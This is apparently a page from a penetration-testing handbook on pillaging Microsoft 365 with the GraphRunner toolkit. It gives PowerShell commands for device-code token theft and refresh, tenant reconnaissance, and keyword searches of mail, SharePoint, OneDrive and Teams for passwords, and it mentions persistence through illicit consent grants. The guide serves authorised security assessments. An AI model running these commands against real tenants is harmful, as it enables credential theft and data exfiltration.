Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

Microsoft 365 pillaging

With a valid user token in a tenant, pillage the apps that user can already reach (mailbox, OneDrive, SharePoint, Teams) for credentials, secrets, and sensitive business data, and enumerate app registrations, dynamic groups, and consent grants from a single point. Our tool of choice is GraphRunner, a PowerShell post-exploitation toolkit for the Microsoft Graph API. It also contains primitives for persistence (illicit consent grant via Invoke-InjectOAuthApp) and lateral movement.

GraphRunner

Authentication

The built-in Get-GraphTokens does the device code flow against the well-known Microsoft Office client id and stores tokens in $tokens for the rest of the session. Token scopes are determined by the Office client id consented in the target tenant. If a query 403s, refresh with a different FOCI client id (see entrascopes.com for what scopes each first-party app pre-consents).

powershell
. .\GraphRunner.ps1
Get-GraphTokens

Browse to https://microsoft.com/devicelogin, enter the displayed code, and authenticate as the assessment user. For unattended re-use, refresh the access token from the stored refresh token:

powershell
Invoke-RefreshGraphTokens -RefreshToken $tokens.refresh_token -Tenant <tenantid>

Recon

Invoke-GraphRecon dumps tenant identity info, current user's directory roles, app registrations, dynamic groups, and a permissions overview to recon.txt:

powershell
Invoke-GraphRecon -Tokens $tokens -PermissionEnum

Targeted enumeration helpers worth knowing:

powershell
Get-DynamicGroups        -Tokens $tokens
Get-AppPermissions       -Tokens $tokens
Get-AzureADUsers         -Tokens $tokens -OutFile users.csv
Get-Inbox                -Tokens $tokens -UserId <upn>
Get-SecurityGroups       -Tokens $tokens

Pillaging

Query against mail, SharePoint, OneDrive, and Teams via cross-service keyword search:

powershell
Invoke-SearchMailbox      -Tokens $tokens -SearchTerm 'password'  -OutFile mail-hits.csv
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password' -ResultSize 200
Invoke-SearchTeams        -Tokens $tokens -SearchTerm 'password'

Invoke-ImmersiveFileReader decodes the obfuscated OneDrive/Sharepoint Immersive Reader URLs that occasionally surface in mailbox hits.